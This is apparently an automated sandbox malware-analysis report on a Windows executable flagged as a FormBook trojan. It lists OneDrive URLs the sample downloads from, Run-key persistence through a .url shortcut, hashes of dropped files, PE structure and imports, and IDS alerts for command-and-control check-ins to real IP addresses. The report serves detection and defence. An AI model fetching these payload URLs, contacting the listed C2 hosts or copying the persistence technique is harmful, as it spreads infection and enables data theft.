https://ppqfqw.ph.files.1drv.com/y4mcSg4TVpIg-eA6Y1ciUp4Dzz62AcO4SwOj-306Rp8dovP_vJs6bBF8upLxcpz7eVd | 0321423605241625.exe, 00000000.00000002.307309131.0000000000858000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301144762.0000000000850000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000002.00000000.351845290.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.310261242.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.434855289.0000000000921000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ppqfqw.ph.files.1drv.com/y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3 | 0321423605241625.exe, 00000000.00000003.301289184.000000000089F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ppqfqw.ph.files.1drv.com/U0 | 0321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ppqfqw.ph.files.1drv.com/ | 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.301178169.0000000000864000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307357943.0000000000862000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PR | 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ppqfqw.ph.files.1drv.com/_ | 0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://onedrive.live.com/ | 0321423605241625.exe, 00000000.00000002.307058995.00000000007FF000.00000004.00000020.00020000.00000000.sdmp | false | | high
                                                    https://ppqfqw.ph.files.1drv.com/s0321423605241625.exe, 00000000.00000003.301194730.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000002.307576454.0000000000874000.00000004.00000020.00020000.00000000.sdmp, 0321423605241625.exe, 00000000.00000003.299996979.000000000085A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
IP | Domain | Country | ASN | ASN Name | Malicious
13.107.43.12 | l-0003.l-dc-msedge.net | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                      Analysis ID:756155
                                                      Start date and time:2022-11-29 18:23:06 +01:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 10m 2s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:0321423605241625.exe
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:12
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.evad.winEXE@11/5@8/1
                                                      EGA Information:
                                                      • Successful, ratio: 100%
                                                      HDC Information:
                                                      • Successful, ratio: 98.9% (good quality ratio 86.8%)
                                                      • Quality average: 75%
                                                      • Quality standard deviation: 33.7%
                                                      HCA Information:
                                                      • Successful, ratio: 100%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, conhost.exe
                                                      • TCP Packets have been reduced to 100
                                                      • Excluded IPs from analysis (whitelisted): 13.107.42.13
                                                      • Excluded domains from analysis (whitelisted): l-0004.l-msedge.net, odc-web-brs.onedrive.akadns.net, client.wns.windows.com, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-web-geo.onedrive.akadns.net, ph-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-ph-files-geo.onedrive.akadns.net, odc-ph-files-brs.onedrive.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
18:23:59 | API Interceptor | 1x Sleep call for process: 0321423605241625.exe modified
18:24:05 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Mwqrxeuz C:\Users\Public\Libraries\zuexrqwM.url
18:24:14 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Mwqrxeuz C:\Users\Public\Libraries\zuexrqwM.url
18:24:18 | API Interceptor | 1x Sleep call for process: Mwqrxeuz.exe modified
                                                      Process:C:\Users\user\Desktop\0321423605241625.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):167894
                                                      Entropy (8bit):7.836989185036909
                                                      Encrypted:false
                                                      SSDEEP:3072:oX7iyI1g1T9ZeIssvAq21B+OXSuWQ/e9WMEnOuljlyTe9iotErmwT46lcHNo9igQ:oX2yA8T9ZeIPoHBSDGDM9u4K9ioQESTQ
                                                      MD5:A4230DEF1381688D96A42C48723B6FB4
                                                      SHA1:DAC39DC194EB7525BE189B5BE47E7B3A70E8DF0B
                                                      SHA-256:C3F4FA12B0F5A069BD9CEF7EE09AEEE8DADB2199A3A0F05009E068C0CC0CB3F8
                                                      SHA-512:E6EA4CB1E3693DD84145D6475EA2EBB2D01C4D1BA980CE42924DC83D396669CC423C6E5589E050CA33FD1B1EF7B21AAF2DC7B4674294917684557D5C716CFB13
                                                      Malicious:false
                                                      Reputation:low
                                                      Process:C:\Users\user\Desktop\0321423605241625.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):750592
                                                      Entropy (8bit):6.881084216281991
                                                      Encrypted:false
                                                      SSDEEP:12288:i1qMhtVLzLypCggIh36+O9dvjpQVeri4Z2qKk/RqIkr:WFhHzmQgn6+8T/r7saqI
                                                      MD5:EDB1382C354EC6C09C53473E5335703A
                                                      SHA1:A1A5FBFCE034731CBA1072BAB6B97B26C8A90C79
                                                      SHA-256:C2C6EEC67A1561C3A49179DDF756480876D92588C2E83D64246A04C3D724CB3D
                                                      SHA-512:7A39E02E0C6B5036763A7646A5960DE36230EAEF32DA6B36687AA71170BD2125775888EC71FF112FB76A38D17D77B650089257043288FAE82598DEE5E6987ED9
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 36%
                                                      Reputation:low
                                                      Process:C:\Users\user\Desktop\0321423605241625.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Users\user\Desktop\0321423605241625.exe
                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Mwqrxeuz.exe">), ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):100
                                                      Entropy (8bit):5.027627100346909
                                                      Encrypted:false
                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMiCK0dAIvsGKd7DKCov:HRYFVmTWDyzM7vsb7uCy
                                                      MD5:7DDCB7FA3CEA8198D5ADEBF8F7797F74
                                                      SHA1:4552A0DFE75A7CF4875DDB3575800AE137F88E04
                                                      SHA-256:7E678198AFD5C53ADDBD2133245E72EBF9D6885F20496F5ACAEF2CF56C54856D
                                                      SHA-512:D985A2CEF6438CAA20E784A43CF752BCB1AF2608633C050DF55A194766D1C1BC3D106D7786D63E316DEF0E011E98D263C99510D7E843E8A6709F4DDFD1BA67F3
                                                      Malicious:false
                                                      Yara Hits:
                                                      • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\zuexrqwM.url, Author: @itsreallynick (Nick Carr)
                                                      • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\Libraries\zuexrqwM.url, Author: @itsreallynick (Nick Carr)
                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Mwqrxeuz.exe"..IconIndex=31..HotKey=29..
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):6.881084216281991
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.38%
                                                      • InstallShield setup (43055/19) 0.43%
                                                      • Windows Screen Saver (13104/52) 0.13%
                                                      • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      File name:0321423605241625.exe
                                                      File size:750592
                                                      MD5:edb1382c354ec6c09c53473e5335703a
                                                      SHA1:a1a5fbfce034731cba1072bab6b97b26c8a90c79
                                                      SHA256:c2c6eec67a1561c3a49179ddf756480876d92588c2e83d64246a04c3d724cb3d
                                                      SHA512:7a39e02e0c6b5036763a7646a5960de36230eaef32da6b36687aa71170bd2125775888ec71ff112fb76a38d17d77b650089257043288fae82598dee5e6987ed9
                                                      SSDEEP:12288:i1qMhtVLzLypCggIh36+O9dvjpQVeri4Z2qKk/RqIkr:WFhHzmQgn6+8T/r7saqI
                                                      TLSH:D4F47D6662D08637D02715389C07A7A8692FAEE02F14F8956BD53DCC5F383CE743926B
                                                      Icon Hash:2321270727090923
                                                      Entrypoint:0x4626e8
                                                      Entrypoint Section:.itext
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                      DLL Characteristics:
                                                      Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:5a047051636dce23e36a7dceaf1507c0
                                                      Instruction
                                                      push ebp
                                                      mov ebp, esp
                                                      add esp, FFFFFFF0h
                                                      mov eax, 0046105Ch
                                                      call 00007FDD10D0EC15h
                                                      mov ecx, dword ptr [0046D410h]
                                                      mov eax, dword ptr [0046D324h]
                                                      mov eax, dword ptr [eax]
                                                      mov edx, dword ptr [00460A90h]
                                                      call 00007FDD10D615EDh
                                                      mov eax, dword ptr [0046D324h]
                                                      mov eax, dword ptr [eax]
                                                      call 00007FDD10D61661h
                                                      call 00007FDD10D0CD18h
                                                      lea eax, dword ptr [eax+00h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x72000 | 0x25ac | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7e000 | 0x42400 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x77000 | 0x6eec | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0x76000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0x72724 | 0x5e4 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6022c | 0x60400 | False | 0.5191025771103897 | data | 6.531038724700122 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x62000 | 0x724 | 0x800 | False | 0.57373046875 | data | 5.847823102407548 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x63000 | 0xa49c | 0xa600 | False | 0.08553746234939759 | data | 6.533389727605739 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x6e000 | 0x3660 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x72000 | 0x25ac | 0x2600 | False | 0.32452713815789475 | data | 5.139331879404015 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0x75000 | 0x34 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x76000 | 0x18 | 0x200 | False | 0.05078125 | data | 0.2108262677871819 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x77000 | 0x6eec | 0x7000 | False | 0.6196986607142857 | data | 6.6810323966616 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x7e000 | 0x42400 | 0x42400 | False | 0.4435620577830189 | data | 6.403601787519998 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_CURSOR | 0x7ef0c | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States
RT_CURSOR | 0x7f040 | 0x134 | data | English | United States
RT_CURSOR | 0x7f174 | 0x134 | data | English | United States
RT_CURSOR | 0x7f2a8 | 0x134 | data | English | United States
RT_CURSOR | 0x7f3dc | 0x134 | data | English | United States
RT_CURSOR | 0x7f510 | 0x134 | data | English | United States
RT_CURSOR | 0x7f644 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States
RT_BITMAP | 0x7f778 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x7f8a0 | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x7f9c8 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x7faf0 | 0xe8 | Device independent bitmap graphic, 13 x 16 x 4, image size 128 | English | United States
RT_BITMAP | 0x7fbd8 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x7fd00 | 0x128 | Device independent bitmap graphic, 20 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x7fe28 | 0xd0 | Device independent bitmap graphic, 13 x 13 x 4, image size 104 | English | United States
RT_BITMAP | 0x7fef8 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x80020 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x80148 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x80270 | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x80398 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x804c0 | 0xe8 | Device independent bitmap graphic, 12 x 16 x 4, image size 128 | English | United States
RT_BITMAP | 0x805a8 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x806d0 | 0x128 | Device independent bitmap graphic, 20 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x807f8 | 0xd0 | Device independent bitmap graphic, 13 x 13 x 4, image size 104 | English | United States
RT_BITMAP | 0x808c8 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x809f0 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x80b18 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x80c40 | 0x128 | Device independent bitmap graphic, 19 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x80d68 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x80e90 | 0xe8 | Device independent bitmap graphic, 13 x 16 x 4, image size 128 | English | United States
RT_BITMAP | 0x80f78 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x810a0 | 0x128 | Device independent bitmap graphic, 20 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x811c8 | 0xd0 | Device independent bitmap graphic, 13 x 13 x 4, image size 104 | English | United States
RT_BITMAP | 0x81298 | 0x128 | Device independent bitmap graphic, 21 x 16 x 4, image size 192 | English | United States
RT_BITMAP | 0x813c0 | 0x128 | Device independent bitmap graphic, 17 x 16 x 4, image size 192 | English | United States
RT_ICON | 0x814e8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | |
RT_ICON | 0x82590 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | |
RT_ICON | 0x84b38 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736 | |
RT_ICON | 0x89fc0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | |
RT_STRING | 0x93468 | 0x200 | data | |
RT_STRING | 0x93668 | 0x188 | data | |
RT_STRING | 0x937f0 | 0xc8 | data | |
RT_STRING | 0x938b8 | 0x350 | data | |
RT_STRING | 0x93c08 | 0x3d8 | data | |
RT_STRING | 0x93fe0 | 0x388 | data | |
RT_STRING | 0x94368 | 0x418 | data | |
RT_STRING | 0x94780 | 0x140 | data | |
RT_STRING | 0x948c0 | 0xcc | data | |
RT_STRING | 0x9498c | 0x1ec | data | |
RT_STRING | 0x94b78 | 0x3b0 | data | |
RT_STRING | 0x94f28 | 0x354 | data | |
RT_STRING | 0x9527c | 0x2a4 | data | |
RT_RCDATA | 0x95520 | 0x10 | data | |
RT_RCDATA | 0x95530 | 0x2a7c2 | GIF image data, version 89a, 300 x 168 | English | United States
RT_RCDATA | 0xbfcf4 | 0x254 | data | |
RT_RCDATA | 0xbff48 | 0x3e0 | Delphi compiled form 'TForm1' | |
RT_GROUP_CURSOR | 0xc0328 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc033c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc0350 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc0364 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc0378 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc038c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_CURSOR | 0xc03a0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States
RT_GROUP_ICON | 0xc03b4 | 0x3e | data | |
DLL | Import
oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll | GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll | GetACP, Sleep, VirtualFree, VirtualAlloc, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll | TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll | CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
kernel32.dll | lstrcpyA, lstrcatA, _lread, _lopen, _llseek, _lclose, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey, IsValidSid
kernel32.dll | Sleep
oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
comctl32.dll | _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
comdlg32.dll | GetOpenFileNameA
                                                      URLAutodialHookCallback
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/29/22-18:26:33.912103 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49719 | 80 | 192.168.2.5 | 217.160.0.95
11/29/22-18:26:08.582417 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49715 | 80 | 192.168.2.5 | 192.0.78.141
11/29/22-18:26:33.912103 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49719 | 80 | 192.168.2.5 | 217.160.0.95
11/29/22-18:26:23.800962 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 52.85.92.84
11/29/22-18:26:33.912103 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49719 | 80 | 192.168.2.5 | 217.160.0.95
11/29/22-18:26:08.582417 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49715 | 80 | 192.168.2.5 | 192.0.78.141
11/29/22-18:26:23.800962 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49717 | 80 | 192.168.2.5 | 52.85.92.84
11/29/22-18:26:08.582417 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49715 | 80 | 192.168.2.5 | 192.0.78.141
